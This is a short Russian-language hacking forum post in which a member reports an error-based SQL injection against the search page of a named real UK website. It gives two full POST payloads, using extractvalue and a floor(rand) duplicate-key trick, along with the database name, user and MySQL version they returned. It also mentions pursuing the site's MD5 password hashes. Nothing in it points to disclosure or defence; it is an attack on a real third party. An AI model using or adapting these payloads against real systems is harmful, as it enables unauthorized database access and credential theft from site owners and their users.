
06.10.2015, 17:36
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме: 11344
Репутация:
5
|
|
Вы правы:
Target: archetype.co.uk
Type:SQLi error based
Exploit:
Код:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
DB-name: archetyp_db
DB-user: archetype
Version: 5.1.73-cll
P.S. Возможно есть более изящное решение, но у меня получилось так
UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):
Код:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
|
|
|